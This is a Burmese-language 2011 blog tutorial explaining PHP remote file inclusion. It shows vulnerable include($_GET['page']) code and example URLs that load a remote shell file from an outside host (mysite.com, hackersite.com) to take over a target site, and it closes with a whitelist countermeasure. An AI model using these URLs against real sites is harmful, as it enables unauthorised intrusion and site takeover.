စဉ်းစားမှုမပါဘဲ သင်ယူသော ပညာသည် အချည်းနှီးဖြစ်၍ ၊ ပညာမရှိဘဲ စဉ်းစားခြင်းကား အလွန် အန္တရာယ်ကြီးပေသည်။ (ကွန်ဖြူးရှပ်)

Saturday, October 8, 2011

RFI Hacking Guide

RFF : http://www.technoclans.co.cc/2011/09/28/hello-world/#more-1
RFI Hacking ဆိုတာ လေးကို အရင်ပြောပါ့မယ်.။ RFI Hacking ရဲ့ အရှည်က Remote File Inclusion ဖြစ်ပြီး Remote ဆိုတဲ့အတိုင်း Website တစ်ခုကို အခြား Website ကနေ ထိန်းချုပ်ခြင်းပါ..
ပထမဦးဆုံး Exploit Code ကိုအရင်ကြည့်ရအောင်…။
PHP Code:
$page = $_GET['page'];
include(“”.$page.”.html”);
include Command က တဆင့် တခြား Website က Webpage ကို ကူးယူနိုင်တဲ့ Vuln ကို ဖြစ်စေပါတယ်..။ ဥပမာ…Website တစ်ခုမှာ
1.Music
2.Video
3.contact ဆိုတဲ့ Page သုံးခုရှိမယ်ဆိုပါစို့…။ Index ကောပါရင် လေးခုပေါ့ဗျာ.။ ဒီတော့
1.music.php
2.video.php
3.contact.php
4.index.php ဆိုပြီး လေးခုရှိပါမယ် ( Index Page မှာတော့ Page Header တွေ Footer တွေ ပါမယ်ပေါ့ဗျာ..)
အဲ့ဒီ့ Page လေးခုကို သွားချင်ရင် -
www.target.com/index.php
www.target.com/index.php?=music.php
www.target.com/index.php?=video.php
www.target.com/index.php?=contact.php  ဆိုပြီး သွားရပါလိမ့်မယ်.။
ဒီလို ဘာလို့ သွားလို့ရတာလဲဆိုတာကို ပြောဖို့ Vuln ဖြစ်နေတဲ့ Index Page ရဲ့  Code လေးကိုကြည့်ရအောင်..။
PHP Code:
//html for header
//html for menu
<?php
$page = $_GET['page'];
include($page); ?>
//html for footer
php Code ရဲ့  Line No.2 ကိုကြည့်လိုက်ပါ. Get Method ကို တွေ့ ပါလိမ့်မယ်.။ အဲ့ဒီ့ Get Method ကြောင့် ကျွန်တော်တို့  Page တွေကိုသွားတဲ့အခါမှာ
www.target.com/index.php?=video.php လို့ သွားခွင့်ရှိတာပါ..။ Coding မှာ ကြည့်လိုက်ပါ.. လိုင်း နံပတ် ၅ က include ကြောင့် video Page မှာ Copy ကူးပြီး Index မှာ video.php အနေနဲ့ တက်လာတာပါ..။ ဒါက အကြီးမားဆုံး Security အမှားကြီးပါ.။ ဒီသဘောအရဆို တခြား အဝေးက Website တစ်ခု ကိုကော Copy ကူးပြီး index မှာလာချိတ်လို့ ကော မရဘူးလားလို့  မေးလာရင် ရပါတယ်
www.target.com/index.php?=http://www.google.com/?  လို့ သာ ရိုက်လိုက်ရင် google Page ဟာ Copy ကူးပြီး Index Page မှာ တက်လာပါတော့တယ်
google မဟုတ်ဘဲ တခြား ကြိုက်တဲ့ Page တင်လို့ရတာကြောင့် ကျွန်တော်တို့ ဟာ shell link ကို ထည့်ပြီး Target Website ကိုထည့်ချုပ်လိုက်ပါတော့တယ်.။ အောက်မှာကြည့်ပါ..။
http://www.target.com/index.php?page=http://mysite.com/shell.txt ဆိုပြီး ချိတ်လိုက်တာနဲ့ Text File အနေနဲ့ သိမ်းဆည်းထားတဲ့ Shell ကို excute လုပ်ပြီး Target Website ပေါ်မှာ လာ Run တဲ့ အတွက် ကျွန်တော်ဟာ Target ရဲ့  Website ကို ထိန်းချုပ် ခွင့်ရှိသွားပါပြီ..။
…………………………………………………
RFI Exploit ဖြစ်စေတဲ့ အခြား ဥပမာ တစ်ခုကို ထပ်ပြီး တင်ပြပါ့မယ်..။ Undefined Variable ပါ..။ Programming ကို Basic လောက် နားလည်တဲ့လူဆိုရင်တော့ Variable ဆိုတာ ဘာလဲ လို့ ထပ်ရှင်းပြဖို့ မလိုတော့ပါဘူး ဒီနေရာမှာ Hacking Method ကို ပဲ ပြောပြမှာ ဖြစ်လို့ Variable ဆိုတာ ကို ရှင်းပြမနေတော့ပါဘူး..။
Developer တစ်ယောက်ဟာ သူ့  ရဲ့  Website ကို သူ့ ရဲ့  Mysql Server နဲ့  ချိတ်ဆက်ချင်ပါတယ်.။ ဥပမာ..သူ့  ဆိုဒ် Index Page မှာ Content တွေ ကို Mysql နဲ့ ချိတ်ထားချင်တယ်ဆိုပါစို့. Mysql Server ကို ချိတ်ဆက်ဖို့ဆိုရင် User Name နဲ့  Password တစ်ခု လိုအပ်ပါလိမ့်မယ်..။ အဲ့ဒီ့ User Name နဲ့  Password ကို db_details.php ဆိုတဲ့ File ထဲမှာ သိမ်းထားပါတယ်.။
တကယ်လို့  ကျွန်တော်တို့ဟာ video.php ဆိုတာကို index Page က တစ်ဆင့် ဖွင့်တယ်ဆိုပါစို့ဗျာ.။
www.target/index.php?page=video.php
တကယ်လို့ အဲ့ဒီ့ Page က PHP Code ကိုကြည့်မယ်ဆိုရင်..
PHP Code:
//html for header
//html for menu
<?php
$database_config_file = “db_details.php”;
$page = $_GET['page'];
include($page);
?>
//html for footer <?php
include($database_config_file);
//code to connect to MySQL and get the latest updates
?>
Index Page မှာ $database_config_file ကို db_detils.php နဲ့ ချိတ်ထားတာကို တွေ့ ရပါမယ်..။ ဒါပေသိ ကျွန်တော် တို့  ခုရောက်နေတဲ့ နေရာက video.php ဖြစ်တဲ့အတွက် အဲ့ဒီ့ db_detils.php နဲ့ချိတ်ဖို့ မလိုအပ်ပါဘူး..ဒီနေရာမှာ လာချိတ်နေတာတွေ့  ရ မှာပါ..။ အဲ့ဒီ့ နေရာမှာ ပြဿနာ တက်သွားတာပါ..။ ဒီတော့ ထုံးစံ အတိုင်း ကျွန်တော်တို့ ရဲ့   Shell Link ကို ချိတ်ခွင့်ရှိသွားပါပြီ..။
www.target/index.php?page=http://www.hackersite.com/shell.txt ပေါ့ဗျ  
RFI Hacking Technique ကတော့ ဒီနေရာမှာ ပြီးသွားပါပြီ..။ အောက်ဟာကတော့ Countermeasure လေးပါ..။

Countermeasure

ရှေ့ မှာ သီအိုရီ ပြောခဲ့တဲ့ အတိုင်း include Method ကြောင့် Copy ကူးပြီး Get နဲ့ လှမ်းယူလိုက်တာဖြစ်တဲ့အတွက် ဘယ်ကဟာကို လှမ်းယူရမယ်ဆိုတာ အတိအကျ ပြောပေးလိုက်ရင် ကူးချင်တဲ့  ဆိုဒ်ကို Copy ကူးခွင့်ပေးမှာ မဟုတ်ဘဲ တိတိကျကျ ဖြစ်သွားမှာပါ  
PHP Code
<?php
$page = $_GET['page'];
switch($page){
case “videogames”;
include(“videogames.php”);
break;
case “contact”:
include(“contact.php”);
break;
case “music”:
include(“music.php”);
break;
default: //A page wasn’t chosen, or one that wasn’t “home” or “gallery”
echo “Choose a page from our fine selection!1!!”;
break;
}
?>
အခုဆိုရင် RFI Hacking ကို သေသေချာချာ နားလည် သွားလောက်ပြီ ထင်ပါတယ်…။
အားလုံး အဆင်ပြေကြပါစေ…။
Related Posts Plugin for WordPress, Blogger...